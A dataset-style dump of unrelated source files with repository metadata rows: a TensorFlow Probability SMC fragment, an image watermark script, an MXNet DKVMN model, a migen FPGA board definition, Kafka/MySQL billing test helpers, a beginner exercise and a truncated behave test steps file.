pkr = kernel.bootstrap_results(current_state)
kernel_log_accept_ratio, _ = gather_mh_like_result(pkr)
def mutate_onestep(i, state, pkr, log_accept_prob_sum):
next_state, next_kernel_results = kernel.one_step(state, pkr)
kernel_log_accept_ratio, _ = gather_mh_like_result(pkr)
log_accept_prob = tf.minimum(kernel_log_accept_ratio, 0.)
log_accept_prob_sum = log_add_exp(
log_accept_prob_sum, log_accept_prob)
return i + 1, next_state, next_kernel_results, log_accept_prob_sum
(
_,
next_state,
next_kernel_results,
log_accept_prob_sum
) = tf.while_loop(
cond=lambda i, *args: i < num_steps,
body=mutate_onestep,
loop_vars=(
tf.zeros([], dtype=tf.int32),
current_state,
pkr,
# we accumulate the acceptance probability in log space.
tf.fill(
ps.shape(kernel_log_accept_ratio),
tf.constant(-np.inf, kernel_log_accept_ratio.dtype))
),
parallel_iterations=parallel_iterations
)
_, kernel_target_log_prob = gather_mh_like_result(next_kernel_results)
avg_log_accept_prob_per_particle = log_accept_prob_sum - tf.math.log(
tf.cast(num_steps + 1, log_accept_prob_sum.dtype))
return (next_state,
avg_log_accept_prob_per_particle,
kernel_target_log_prob)
# One SMC steps.
def smc_body_fn(stage, state, smc_kernel_result):
"""Run one stage of SMC with constant temperature."""
(
new_marginal,
new_inv_temperature,
log_weights
) = update_weights_temperature(
smc_kernel_result.inverse_temperature,
smc_kernel_result.particle_info.likelihood_log_prob)
# TODO(b/152412213) Use a tf.scan to better collect debug info.
if PRINT_DEBUG:
tf.print(
'Stage:', stage,
'Beta:', new_inv_temperature,
'n_steps:', smc_kernel_result.num_steps,
'accept:', tf.exp(reduce_logmeanexp(
smc_kernel_result.particle_info.log_accept_prob, axis=0)),
'scaling:', tf.exp(reduce_logmeanexp(
smc_kernel_result.particle_info.log_scalings, axis=0))
)
(resampled_state,
resampled_particle_info), _ = weighted_resampling.resample(
particles=(state, smc_kernel_result.particle_info),
log_weights=log_weights,
resample_fn=resample_fn,
seed=seed_stream)
next_num_steps, next_log_scalings = tuning_fn(
smc_kernel_result.num_steps,
resampled_particle_info.log_scalings,
resampled_particle_info.log_accept_prob)
# Skip tuning at stage 0.
next_num_steps = tf.where(stage == 0,
smc_kernel_result.num_steps,
next_num_steps)
next_log_scalings = tf.where(stage == 0,
resampled_particle_info.log_scalings,
next_log_scalings)
next_num_steps = tf.clip_by_value(
next_num_steps, min_num_steps, max_num_steps)
next_state, log_accept_prob, tempered_log_prob = mutate(
resampled_state,
next_log_scalings,
next_num_steps,
new_inv_temperature)
next_pkr = SMCResults(
num_steps=next_num_steps,
inverse_temperature=new_inv_temperature,
log_marginal_likelihood=(new_marginal +
smc_kernel_result.log_marginal_likelihood),
particle_info=ParticleInfo(
log_accept_prob=log_accept_prob,
log_scalings=next_log_scalings,
tempered_log_prob=tempered_log_prob,
likelihood_log_prob=likelihood_log_prob_fn(*next_state),
))
return stage + 1, next_state, next_pkr
(
n_stage,
final_state,
final_kernel_results
) = tf.while_loop(
cond=lambda i, state, pkr: ( # pylint: disable=g-long-lambda
(i < max_stage) &
tf.reduce_any(pkr.inverse_temperature < 1.)),
body=smc_body_fn,
loop_vars=(
tf.zeros([], dtype=tf.int32),
current_state,
current_pkr),
parallel_iterations=parallel_iterations
)
if unwrap_state_list:
final_state = final_state[0]
return n_stage, final_state, final_kernel_results
| [
"[email protected]"
] | |
b674cb6e1d39ea0db9ce015053153a2bdaba5038 | 699cad5fee497cce94463decf1bf2b811e3fd244 | /16이미지요리/watermark.py | 783d8c4b885bcab80a88fe98c929e68daade41b9 | [] | no_license | Jeonghwan-Yoo/brain_python3 | 91974019a29013abe8c9f9ed132c48b404259e2f | a22e870515e760aaa497cbc99305977cf2f01a3d | refs/heads/master | 2020-07-27T00:02:29.604848 | 2019-09-16T13:16:09 | 2019-09-16T13:16:09 | 208,802,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | import sys
from wand.image import Image
if len(sys.argv) < 3:
print('{0} <Image 1> <Image 2>'.format(sys.argv[0]))
sys.exit()
image1_path=sys.argv[1]
image2_path=sys.argv[2]
with Image(filename=image1_path) as image1:
with Image(filename=image2_path) as image2:
with image1.clone() as clone:
clone.watermark(image2, 0.7, 100, 100)
clone.save(filename=image1_path+'_'+image2_path) | [
"[email protected]"
] | |
858a8df04939295cb7b278f80a8174f99d92e283 | c1869b7106a4651ecc0f0f53b82d5f11021896e3 | /XKT/DKVMN/net.py | a5a8b8568a55b5a938ccfea0ee51b82b111fd30c | [
"MIT"
] | permissive | bigdata-ustc/XKT | 6efd7ff5b09c22ed9099f5b9b614edceff1cada0 | b3ac07541b92001b62d7cff4e8fe7e5a69c5c93c | refs/heads/master | 2021-09-22T19:22:25.563651 | 2021-09-16T02:56:10 | 2021-09-16T02:56:10 | 194,855,614 | 18 | 9 | MIT | 2021-09-16T02:56:11 | 2019-07-02T12:06:12 | Python | UTF-8 | Python | false | false | 20,141 | py | # coding: utf-8
# 2021/8/22 @ tongshiwei
from baize.mxnet.utils import format_sequence, mask_sequence_variable_length
from mxnet import gluon
from mxnet import ndarray
def get_net(ku_num, key_embedding_dim, value_embedding_dim, hidden_num,
key_memory_size,
nettype="DKVMN", dropout=0.0, **kwargs):
return DKVMN(
ku_num=ku_num,
key_embedding_dim=key_embedding_dim,
value_embedding_dim=value_embedding_dim,
hidden_num=hidden_num,
key_memory_size=key_memory_size,
nettype=nettype,
dropout=dropout,
**kwargs
)
class KVMNCell(gluon.HybridBlock):
def __init__(self, memory_state_dim, memory_size, input_size=0, prefix=None, params=None, *args, **kwargs):
super(KVMNCell, self).__init__(prefix=prefix, params=params)
self._input_size = input_size
self.memory_size = memory_size
self.memory_state_dim = memory_state_dim
def addressing(self, F, control_input, memory):
"""
Parameters
----------
F
control_input: Shape (batch_size, control_state_dim)
memory: Shape (memory_size, memory_state_dim)
Returns
-------
correlation_weight: Shape (batch_size, memory_size)
"""
similarity_score = F.FullyConnected(data=control_input,
num_hidden=self.memory_size,
weight=memory,
no_bias=True,
name="similarity_score")
correlation_weight = F.SoftmaxActivation(similarity_score) # Shape: (batch_size, memory_size)
return correlation_weight
def reset(self):
pass
def hybrid_forward(self, F, control_input, memory, *args, **kwargs):
return self.addressing(F, control_input, memory)
class KVMNReadCell(KVMNCell):
def __init__(self, memory_state_dim, memory_size, input_size=0, prefix=None, params=None):
super(KVMNReadCell, self).__init__(memory_state_dim, memory_size, input_size, prefix, params)
def read(self, memory, control_input=None, read_weight=None):
return self(memory, control_input, read_weight)
def hybrid_forward(self, F, memory, control_input=None, read_weight=None):
"""
Parameters
----------
F
control_input: Shape (batch_size, control_state_dim)
memory: Shape (batch_size, memory_size, memory_state_dim)
read_weight: Shape (batch_size, memory_size)
Returns
-------
read_content: Shape (batch_size, memory_state_dim)
"""
if read_weight is None:
read_weight = self.addressing(F, control_input=control_input, memory=memory)
read_weight = F.Reshape(read_weight, shape=(-1, 1, self.memory_size))
read_content = F.Reshape(data=F.batch_dot(read_weight, memory),
# Shape (batch_size, 1, memory_state_dim)
shape=(-1, self.memory_state_dim)) # Shape (batch_size, memory_state_dim)
return read_content
class KVMNWriteCell(KVMNCell):
def __init__(self, memory_state_dim, memory_size, input_size=0,
erase_signal_weight_initializer=None, erase_signal_bias_initializer=None,
add_signal_weight_initializer=None, add_signal_bias_initializer=None,
prefix=None, params=None):
super(KVMNWriteCell, self).__init__(memory_state_dim, memory_size, input_size, prefix, params)
with self.name_scope():
self.erase_signal_weight = self.params.get('erase_signal_weight', shape=(memory_state_dim, input_size),
init=erase_signal_weight_initializer,
allow_deferred_init=True)
self.erase_signal_bias = self.params.get('erase_signal_bias', shape=(memory_state_dim,),
init=erase_signal_bias_initializer,
allow_deferred_init=True)
self.add_signal_weight = self.params.get('add_signal_weight', shape=(memory_state_dim, input_size),
init=add_signal_weight_initializer,
allow_deferred_init=True)
self.add_signal_bias = self.params.get('add_signal_bias', shape=(memory_state_dim,),
init=add_signal_bias_initializer,
allow_deferred_init=True)
def read(self, F, memory, control_input=None, read_weight=None):
if read_weight is None:
read_weight = self.addressing(F, control_input=control_input, memory=memory)
read_weight = F.Reshape(read_weight, shape=(-1, 1, self.memory_size))
read_content = F.Reshape(data=F.batch_dot(read_weight, memory, name=self.name + "read_content_batch_dot"),
# Shape (batch_size, 1, memory_state_dim)
shape=(-1, self.memory_state_dim)) # Shape (batch_size, memory_state_dim)
return read_content
def write(self, memory, control_input, write_weight):
return self(memory, control_input, write_weight)
def hybrid_forward(self, F, memory, control_input, write_weight,
erase_signal_weight, erase_signal_bias, add_signal_weight, add_signal_bias,
):
if write_weight is None:
write_weight = self.addressing(
F, control_input=control_input, memory=memory
) # Shape Shape (batch_size, memory_size)
# erase_signal Shape (batch_size, memory_state_dim)
erase_signal = F.FullyConnected(data=control_input,
num_hidden=self.memory_state_dim,
weight=erase_signal_weight,
bias=erase_signal_bias)
erase_signal = F.Activation(data=erase_signal, act_type='sigmoid', name=self.name + "_erase_signal")
# add_signal Shape (batch_size, memory_state_dim)
add_signal = F.FullyConnected(data=control_input,
num_hidden=self.memory_state_dim,
weight=add_signal_weight,
bias=add_signal_bias)
add_signal = F.Activation(data=add_signal, act_type='tanh', name=self.name + "_add_signal")
# erase_mult Shape (batch_size, memory_size, memory_state_dim)
erase_mult = 1 - F.batch_dot(F.Reshape(write_weight, shape=(-1, self.memory_size, 1)),
F.Reshape(erase_signal, shape=(-1, 1, self.memory_state_dim)),
name=self.name + "_erase_mult")
aggre_add_signal = F.batch_dot(F.Reshape(write_weight, shape=(-1, self.memory_size, 1)),
F.Reshape(add_signal, shape=(-1, 1, self.memory_state_dim)),
name=self.name + "_aggre_add_signal")
new_memory = memory * erase_mult + aggre_add_signal
return new_memory
class DKVMNCell(gluon.HybridBlock):
def __init__(self, key_memory_size, key_memory_state_dim, value_memory_size, value_memory_state_dim,
prefix=None, params=None):
super(DKVMNCell, self).__init__(prefix, params)
self._modified = False
self.reset()
with self.name_scope():
self.key_head = KVMNReadCell(
memory_size=key_memory_size,
memory_state_dim=key_memory_state_dim,
prefix=self.prefix + "->key_head"
)
self.value_head = KVMNWriteCell(
memory_size=value_memory_size,
memory_state_dim=value_memory_state_dim,
prefix=self.prefix + "->value_head"
)
self.key_memory_size = key_memory_size
self.key_memory_state_dim = key_memory_state_dim
self.value_memory_size = value_memory_size
self.value_memory_state_dim = value_memory_state_dim
def forward(self, *args):
"""Unrolls the recurrent cell for one time step.
Parameters
----------
inputs : sym.Variable
Input symbol, 2D, of shape (batch_size * num_units).
states : list of sym.Variable
RNN state from previous step or the output of begin_state().
Returns
-------
output : Symbol
Symbol corresponding to the output from the RNN when unrolling
for a single time step.
states : list of Symbol
The new state of this RNN after this unrolling.
The type of this symbol is same as the output of `begin_state()`.
This can be used as an input state to the next time step
of this RNN.
See Also
--------
begin_state: This function can provide the states for the first time step.
unroll: This function unrolls an RNN for a given number of (>=1) time steps.
"""
# pylint: disable= arguments-differ
self._counter += 1
return super(DKVMNCell, self).forward(*args)
def reset(self):
"""Reset before re-using the cell for another graph."""
self._init_counter = -1
self._counter = -1
for cell in self._children.values():
cell.reset()
def begin_state(self, batch_size=0, func=ndarray.zeros, **kwargs):
"""Initial state for this cell.
Parameters
----------
func : callable, default symbol.zeros
Function for creating initial state.
For Symbol API, func can be `symbol.zeros`, `symbol.uniform`,
`symbol.var etc`. Use `symbol.var` if you want to directly
feed input as states.
For NDArray API, func can be `ndarray.zeros`, `ndarray.ones`, etc.
batch_size: int, default 0
Only required for NDArray API. Size of the batch ('N' in layout)
dimension of input.
**kwargs :
Additional keyword arguments passed to func. For example
`mean`, `std`, `dtype`, etc.
Returns
-------
states : nested list of Symbol
Starting states for the first RNN step.
"""
assert not self._modified, \
"After applying modifier cells (e.g. ZoneoutCell) the base " \
"cell cannot be called directly. Call the modifier cell instead."
states = []
for info in self.state_info(batch_size):
self._init_counter += 1
if info is not None:
info.update(kwargs)
else:
info = kwargs
state = func(name='%sbegin_state_%d' % (self._prefix, self._init_counter),
**info)
states.append(state)
return states
def state_info(self, batch_size=0):
return [
{'shape': (batch_size, self.key_memory_size, self.key_memory_state_dim), '__layout__': 'NC'},
{'shape': (batch_size, self.value_memory_size, self.key_memory_state_dim), '__layout__': 'NC'}
]
def _alias(self):
return 'dkvmn_cell'
def attention(self, F, control_input, memory):
correlation_weight = self.key_head.addressing(F, control_input=control_input, memory=memory)
return correlation_weight # (batch_size, memory_size)
def read(self, F, read_weight, memory):
read_content = self.value_head.read(F, memory=memory, read_weight=read_weight)
return read_content # (batch_size, memory_state_dim)
def write(self, F, write_weight, control_input, memory):
memory_value = self.value_head.write(control_input=control_input,
memory=memory,
write_weight=write_weight)
return memory_value
def hybrid_forward(self, F, keys, values, key_memory, value_memory):
# Attention
correlation_weight = self.attention(F, keys, key_memory)
# Read Process
read_content = self.read(F, correlation_weight, value_memory)
# Write Process
next_value_memory = self.write(F, correlation_weight, values, value_memory)
return read_content, [key_memory, next_value_memory]
def unroll(self, length, keys, values, key_memory, value_memory, layout='NTC', merge_outputs=None,
valid_length=None):
"""Unrolls an RNN cell across time steps.
Parameters
----------
length : int
Number of steps to unroll.
inputs : Symbol, list of Symbol, or None
If `inputs` is a single Symbol (usually the output
of Embedding symbol), it should have shape
(batch_size, length, ...) if `layout` is 'NTC',
or (length, batch_size, ...) if `layout` is 'TNC'.
If `inputs` is a list of symbols (usually output of
previous unroll), they should all have shape
(batch_size, ...).
begin_memory : nested list of Symbol, optional
Input states created by `begin_state()`
or output state of another cell.
Created from `begin_state()` if `None`.
layout : str, optional
`layout` of input symbol. Only used if inputs
is a single Symbol.
merge_outputs : bool, optional
If `False`, returns outputs as a list of Symbols.
If `True`, concatenates output across time steps
and returns a single symbol with shape
(batch_size, length, ...) if layout is 'NTC',
or (length, batch_size, ...) if layout is 'TNC'.
If `None`, output whatever is faster.
valid_length : Symbol, NDArray or None
`valid_length` specifies the length of the sequences in the batch without padding.
This option is especially useful for building sequence-to-sequence models where
the input and output sequences would potentially be padded.
If `valid_length` is None, all sequences are assumed to have the same length.
If `valid_length` is a Symbol or NDArray, it should have shape (batch_size,).
The ith element will be the length of the ith sequence in the batch.
The last valid state will be return and the padded outputs will be masked with 0.
Note that `valid_length` must be smaller or equal to `length`.
Returns
-------
outputs : list of Symbol or Symbol
Symbol (if `merge_outputs` is True) or list of Symbols
(if `merge_outputs` is False) corresponding to the output from
the RNN from this unrolling.
states : list of Symbol
The new state of this RNN after this unrolling.
The type of this symbol is same as the output of `begin_state()`.
"""
# pylint: disable=too-many-locals
self.reset()
keys, axis, F, batch_size = format_sequence(length, keys, layout, False)
values, axis, F, batch_size = format_sequence(length, values, layout, False)
states = F.broadcast_to(F.expand_dims(value_memory, axis=0),
shape=(batch_size, self.value_memory_size, self.value_memory_state_dim))
outputs = []
all_states = []
for i in range(length):
output, [_, new_states] = self(keys[i], values[i], key_memory, states)
states = new_states
outputs.append(output)
if valid_length is not None:
all_states.append(states)
if valid_length is not None:
states = [F.SequenceLast(F.stack(*ele_list, axis=0),
sequence_length=valid_length,
use_sequence_length=True,
axis=0)
for ele_list in zip(*all_states)]
outputs = mask_sequence_variable_length(F, outputs, length, valid_length, axis, True)
# all_read_value_content = F.Concat(*outputs, num_args=length, dim=0)
outputs, _, _, _ = format_sequence(length, outputs, layout, merge_outputs)
return outputs, states
class DKVMN(gluon.HybridBlock):
def __init__(self, ku_num, key_embedding_dim, value_embedding_dim, hidden_num,
key_memory_size, value_memory_size=None, key_memory_state_dim=None, value_memory_state_dim=None,
nettype="DKVMN", dropout=0.0,
key_memory_initializer=None, value_memory_initializer=None,
**kwargs):
super(DKVMN, self).__init__(kwargs.get("prefix"), kwargs.get("params"))
ku_num = int(ku_num)
key_embedding_dim = int(key_embedding_dim)
value_embedding_dim = int(value_embedding_dim)
hidden_num = int(hidden_num)
key_memory_size = int(key_memory_size)
value_memory_size = int(value_memory_size) if value_memory_size is not None else key_memory_size
self.length = None
self.nettype = nettype
self._mask = None
key_memory_state_dim = int(key_memory_state_dim) if key_memory_state_dim else key_embedding_dim
value_memory_state_dim = int(value_memory_state_dim) if value_memory_state_dim else value_embedding_dim
with self.name_scope():
self.key_memory = self.params.get(
'key_memory', shape=(key_memory_size, key_memory_state_dim),
init=key_memory_initializer,
)
self.value_memory = self.params.get(
'value_memory', shape=(value_memory_size, value_memory_state_dim),
init=value_memory_initializer,
)
embedding_dropout = kwargs.get("embedding_dropout", 0.2)
self.key_embedding = gluon.nn.Embedding(ku_num, key_embedding_dim)
self.value_embedding = gluon.nn.Embedding(2 * ku_num, value_embedding_dim)
self.embedding_dropout = gluon.nn.Dropout(embedding_dropout)
self.dkvmn = DKVMNCell(key_memory_size, key_memory_state_dim, value_memory_size, value_memory_state_dim)
self.input_nn = gluon.nn.Dense(50, flatten=False) # 50 is set by the paper authors
self.input_act = gluon.nn.Activation('tanh')
self.read_content_nn = gluon.nn.Dense(hidden_num, flatten=False)
self.read_content_act = gluon.nn.Activation('tanh')
self.dropout = gluon.nn.Dropout(dropout)
self.nn = gluon.nn.HybridSequential()
self.nn.add(
gluon.nn.Dense(ku_num, activation="tanh", flatten=False),
self.dropout,
gluon.nn.Dense(1, flatten=False),
)
def __call__(self, *args, mask=None):
self._mask = mask
result = super(DKVMN, self).__call__(*args)
self._mask = None
return result
def hybrid_forward(self, F, questions, responses, key_memory, value_memory, *args, **kwargs):
length = self.length if self.length else len(responses[0])
q_data = self.embedding_dropout(self.key_embedding(questions))
r_data = self.embedding_dropout(self.value_embedding(responses))
read_contents, states = self.dkvmn.unroll(
length, q_data, r_data, key_memory, value_memory, merge_outputs=True
)
input_embed_content = self.input_act(self.input_nn(q_data))
read_content_embed = self.read_content_act(
self.read_content_nn(
F.Concat(read_contents, input_embed_content, num_args=2, dim=2)
)
)
output = self.nn(read_content_embed)
output = F.sigmoid(output)
output = F.squeeze(output, axis=2)
return output, states
| [
"[email protected]"
] | |
9ecbb22d8a49abc54ee231701a047f52f535810c | 099da16d748e89106b6abea62e49641afe68d04b | /migen/build/platforms/upduino_v1.py | 8f41eb95fde882e115a3239ed0c902de246e7fcf | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | chipmuenk/migen | a191db2e0bbe8f6e1dfc87e54acf2ded13ce69a0 | a7eb394f46ac9d71f4598919294aa9efd1137bfe | refs/heads/master | 2020-05-18T23:29:09.950066 | 2019-11-01T18:56:14 | 2019-11-01T18:56:14 | 184,712,987 | 3 | 0 | NOASSERTION | 2019-05-03T07:08:37 | 2019-05-03T07:08:36 | null | UTF-8 | Python | false | false | 2,945 | py | from migen import *
from migen.build.generic_platform import *
from migen.build.lattice import LatticePlatform
from migen.build.lattice.programmer import IceStormProgrammer
_io = [
("rgb_led", 0,
Subsignal("r", Pins("41")),
Subsignal("g", Pins("40")),
Subsignal("b", Pins("39")),
IOStandard("LVCMOS33")
),
]
spiflash = [
# Only usable in PROG FLASH mode - see JP2 header
("spiflash", 0,
Subsignal("cs_n", Pins("16"), IOStandard("LVCMOS33")),
Subsignal("clk", Pins("15"), IOStandard("LVCMOS33")),
Subsignal("mosi", Pins("14"), IOStandard("LVCMOS33")),
Subsignal("miso", Pins("17"), IOStandard("LVCMOS33")),
),
]
_connectors = [
# JP5's pinout is all Free, except 1 (3.3V) and 2 (GND).
# 3 4 5 6 7 8 9 10 11 12 13 14 15 16
("JP5", "23 25 26 27 32 35 31 37 34 43 36 42 38 28"),
# 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
("JP6", "12 21 13 19 18 11 9 6 44 4 3 48 45 47 46 2"),
]
class MachClock(Module):
def __init__(self, period, out):
self.specials += Instance("SB_HFOSC",
i_CLKHFPU=C(1),
i_CLKHFEN=C(1),
o_CLKHF=out
)
class HfoscRouting(Module):
def __init__(self):
self.hfosc_used = False # Only one default clock,
self.mach_clk_sig = Signal()
def mk_clk(self, name, clk_period):
if not self.hfosc_used:
self.mach_clk_sig.name_override = name
self.submodules.mclk = MachClock(clk_period, self.mach_clk_sig)
self.hfosc_used = True
else:
raise ConstraintError
return self.mach_clk_sig
class Platform(LatticePlatform):
default_clk_name = "sb_hfosc"
default_clk_period = 48
def __init__(self):
self.sb_hfosc_routing = HfoscRouting() # Internal oscillator routing.
LatticePlatform.__init__(self, "ice40-up5k-sg48", _io, _connectors,
toolchain="icestorm")
def request(self, *args, **kwargs):
try:
sig = GenericPlatform.request(self, *args, **kwargs)
except ConstraintError:
# ICE40UP5K internal clock
if args[0] == "sb_hfosc":
# Do not add to self.constraint_manager.matched because we
# don't want this signal to become part of the UCF.
sig = self.sb_hfosc_routing.mk_clk("sb_hfosc", 48)
return sig
def do_finalize(self, f, *args, **kwargs):
f += self.sb_hfosc_routing.get_fragment()
# Handle cases where hfosc is default not default.
if self.default_clk_name != "sb_hfosc":
GenericPlatform.do_finalize(self, f, *args, **kwargs)
if self.default_clk_name == "sb_hfosc":
self.default_clk_period = 48
| [
"[email protected]"
] | |
d84ff8f2c78aba9a9b9af85e7fa3a9b9e16bab5c | 3ea9509a26e59fafc4f53d4c5cf82cf1c600c2dc | /nn/registry.py | 087c86b1fec4023f905a9b9be17f8b60f5d60428 | [
"Apache-2.0"
] | permissive | mgilgamesh/grl | 696230afe03d8332909452941c5d36cf23bd734c | 7d42bb2e78bc3e7b7c3ebbcf356a4d1cf12abebf | refs/heads/master | 2023-08-30T23:10:39.439264 | 2021-10-31T04:17:06 | 2021-10-31T04:17:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 925 | py | import functools
from nn.utils import Dummy
class Registry:
def __init__(self, name):
self._mapping = {None: Dummy}
def register(self, name):
def _thunk(func):
self._mapping[name] = func
return func
return _thunk
def get(self, name):
if isinstance(name, str) or name is None:
return self._mapping[name]
return name
def contain(self, name):
return name in self._mapping
def get_all(self):
return self._mapping
layer_registry = Registry(name='layer')
am_registry = Registry(name='am') # convolutional attention modules
block_registry = Registry(name='block')
subsample_registry = Registry(name='subsample')
cnn_registry = Registry(name='cnn')
def register_all(registry, globs):
for k, v in globs.items():
if isinstance(v, functools.partial):
registry.register(k)(v)
| [
"[email protected]"
] | |
5b44eb7cc37bf636603b548625f23fcca036ddc4 | 3d705ec48c94373817e5f61d3f839988910431e3 | /lib/interface/boss/bill_handler.py | 5bcbc1c4db585f80edef42bb49152c62ff1591ea | [] | no_license | namesuqi/zeus | 937d3a6849523ae931162cd02c5a09b7e37ebdd8 | 3445b59b29854b70f25da2950016f135aa2a5204 | refs/heads/master | 2022-07-24T14:42:28.600288 | 2018-03-29T08:03:09 | 2018-03-29T08:03:09 | 127,256,973 | 0 | 0 | null | 2022-07-07T22:57:57 | 2018-03-29T07:53:16 | Python | UTF-8 | Python | false | false | 6,514 | py | # coding=utf-8
"""
boss系统-计费模块 自动化用例相关的脚本
__author__ = 'liwenxuan'
20170605
"""
import time
from random import choice
from lib.database.pykafka_handler import pykafka_producer, pykafka_consumer
from lib.interface.boss.time_handler import get_second_to_int
from lib.database.mysql_db_v2 import MysqlDB
from lib.interface.boss.environment_constant import BOSS_CRM_HOST
def send_billing_logs_to_kafka(kafka_hosts, schema_host, schema_port, topic, logs_list, consumer_group):
"""
直接往kafka写入logs, 并确认可以从kafka消费到所有写入的logs
:param kafka_hosts: kafka集群的host, 如 "192.168.1.230:9092,192.168.1.232:9092,192.168.1.191:9092,192.168.1.189:9092"
:param schema_host: schema的host, 如 "192.168.1.230"
:param schema_port: schema的port, 如 8081
:param topic: logs的topic, 如 "test_b_download_flow"
:param logs_list: 需要写入的logs, 如 [{k1: v1, k2: v2, ...}, ...]
:param consumer_group: logs的消费组, 如 "boss_bill_daily_test"
:return:
"""
pykafka_consumer(kafka_hosts, schema_host, schema_port, topic, consumer_group)
time.sleep(1)
pykafka_producer(kafka_hosts, schema_host, schema_port, logs_list, topic, write_time=-7)
time.sleep(5)
actual_logs_count = len(pykafka_consumer(kafka_hosts, schema_host, schema_port, topic, consumer_group))
if actual_logs_count == len(logs_list):
return True
else:
print "total", len(logs_list), "logs, receive", actual_logs_count, "logs"
return False
def create_download_logs_list(block_count, logs_count, prefix, ts_second, domain_list):
"""
创建download的logs的list
:param block_count: 将一堆logs记作一个block(块, 与boss的block概念不同), block的数量
:param logs_count: 一个block中包含的logs的数量
:param prefix: log的peer_id的prefix
:param ts_second: log的时间戳(秒级)
:param domain_list: log的url包含的域名的可选范围
:return:
"""
log_list = []
for i in range(block_count):
flow = 1000000 + i * 10240
log_id_prefix = get_second_to_int() # log的16位id标识的前八位, 表示发log的日期(天)及时间(时分秒)
for j in range(logs_count):
log_id = str(log_id_prefix) + str(j).rjust(8, "F")
peer_id = str(prefix).zfill(8) + "FFFFFFFF" + log_id
url = "http://{0}/".format(choice(domain_list))
timestamp = (int(ts_second) - choice(range(0, 301))) * 1000 - choice(range(0, 1000))
log = {"id": log_id, "timestamp": timestamp, "peer_id": peer_id, "url": url, "play_type": "live",
"vvid": "boss_daily_test", "duration": 60, "app": flow, "cdn": flow*3, "p2p": flow*4,
"public_ip": "192.168.0.0", "sdk_agent_name": "boss_daily_test", "sdk_agent_version": "3.11.0"}
log_list.append(log)
return log_list
def create_upload_logs_list(block_count, logs_count, prefix, ts_second):
"""
创建upload的logs的list
:param block_count: 将一堆logs记作一个block(块, 与boss的block概念不同), block的数量
:param logs_count: 一个block中包含的logs的数量
:param prefix: log的peer_id的prefix
:param ts_second: log的时间戳(秒级)
:return:
"""
log_list = []
for i in range(block_count):
flow = 1000000 + i * 10240
log_id_prefix = get_second_to_int() # log的16位id标识的前八位, 表示发log的日期(天)及时间(时分秒)
for j in range(logs_count):
log_id = str(log_id_prefix) + str(j).rjust(8, "F")
peer_id = str(prefix).zfill(8) + "FFFFFFFF" + log_id
timestamp = (int(ts_second) - choice(range(0, 301))) * 1000 - choice(range(0, 1000))
log = {"id": log_id, "timestamp": timestamp, "peer_id": peer_id, "play_type": "live", "duration": 60,
"upload": flow, "public_ip": "192.168.0.0"}
log_list.append(log)
return log_list
def compare_results_for_billing(block_count, logs_count, prefix, ts_second, category, price, unit):
"""
比较预期结果与实际结果是否相符
:param block_count: 将一堆logs记作一个block(块, 与boss的block概念不同), block的数量
:param logs_count: 一个block中包含的logs的数量
:param prefix: log的peer_id的prefix
:param ts_second: log的时间戳(秒级)
:param category: 计费类别, "download"/"upload"
:param price: CRM中设定的计费单价
:param unit: CRM中设定的计价单位, "KB"/"MB"/"GB"
:return:
"""
assert unit in ("KB", "MB", "GB")
account = 0
for i in range(logs_count):
flow = 1000000 + i * 10240
account += flow
print "account one block:", account
total_account = account * block_count
print "account all block:", total_account
total_money = total_account * price
print "money (B):", total_money
if unit == "KB":
expect_account = float(total_account)/1024
expect_money = float(total_money)/1024
elif unit == "MB":
expect_account = float(total_account)/1024/1024
expect_money = float(total_money)/1024/1024
else:
expect_account = float(total_account)/1024/1024/1024
expect_money = float(total_money)/1024/1024/1024
timestamp_end = int(ts_second)
timestamp_start = timestamp_end - 10 * 60
sql = "select sum(account), sum(money) from {0}_billing where ts between {1} and {2} and prefix = '{3}'"\
.format(category, timestamp_start, timestamp_end, prefix)
mysql_db = MysqlDB(host=BOSS_CRM_HOST)
actual_account, actual_money = mysql_db.execute(sql).one_by_one()
del mysql_db
if abs(actual_account - expect_account) <= 0.000001 and abs(actual_money - expect_money) <= 0.000001:
return True
else:
print "account - expect:", expect_account, "; actual:", actual_account
print "money - expect:", expect_money, "; actual:", actual_money
return False
def clear_logs(customer_id, category):
# 为避免自动化测试累积的数据占用boss自动化服务器的空间, 每次测试结束, 清空无效的数据(logs)
ts_millisecond = (int(time.time()) - 86400 * 5) * 1000
sql = "delete from {0}_log_{1} where timestamp <= {2}".format(category, customer_id, ts_millisecond)
mysql_db = MysqlDB(host=BOSS_CRM_HOST)
mysql_db.execute(sql)
time.sleep(1)
del mysql_db
| [
"[email protected]"
] | |
36760485f3ba83fc51a32e232824579aa64e26b2 | 1b0649a5ad50e4b80506d5b4de52a9c0eff22123 | /Lecture04_List_And_Loops/Exercises/rental_car.py | 3fab1daa16ed383a50e10bdd37254de97bcde382 | [] | no_license | duochen/Python-Kids | abeee3935fd80d5f157e7e0775f889c71485ae58 | c2982a5f7581a974b91941c7faeea32e92ee9644 | refs/heads/master | 2020-06-04T21:53:11.865952 | 2019-09-07T01:05:22 | 2019-09-07T01:05:22 | 192,205,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | car = input("What kind of rental car would you like? ")
print(f"Let me check if I can find you a {car}") | [
"[email protected]"
] | |
b200321ee970c90457fd032ce4f154c60390b3fe | 37a70c38e59a8c9098725e8999998ee5aa57f54c | /features/steps/index_page_user_holidays&books.py | 5f5544493a2ccc867641a2f346a9438d0dcfa203 | [] | no_license | A-Zorg/msw_front | 38c0da655104c070a9da07b1a329c7ea7c2dcba3 | 73ac1df709e3b9001c117c1bb9d81c9dee39971b | refs/heads/master | 2023-07-06T20:19:39.439660 | 2021-08-13T16:39:46 | 2021-08-13T16:39:46 | 338,313,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,465 | py | from behave import *
from base.service_functions import check_image, refine_holidays, \
mysql_select, pgsql_del, pgsql_select, remove_spaces
import configparser
from base64 import b64decode
import time
import random
import datetime
config = configparser.ConfigParser()
config.read("config/config.ini")
selectors = configparser.ConfigParser()
selectors.read("config/selectors.ini")
"""------------------------------------------Holidays------------------------------------------------------"""
@step("get next 5 holidays")
def step_impl(context):
context.holidays = refine_holidays(config['holidays_api'])
@step("compare actual holidays name_list with expected")
def step_impl(context):
holidays = context.holidays
for i in range(len(holidays)):
name_expected = str(holidays[i][0])
selelector_list = eval(selectors['index_page_holidays']['name'])
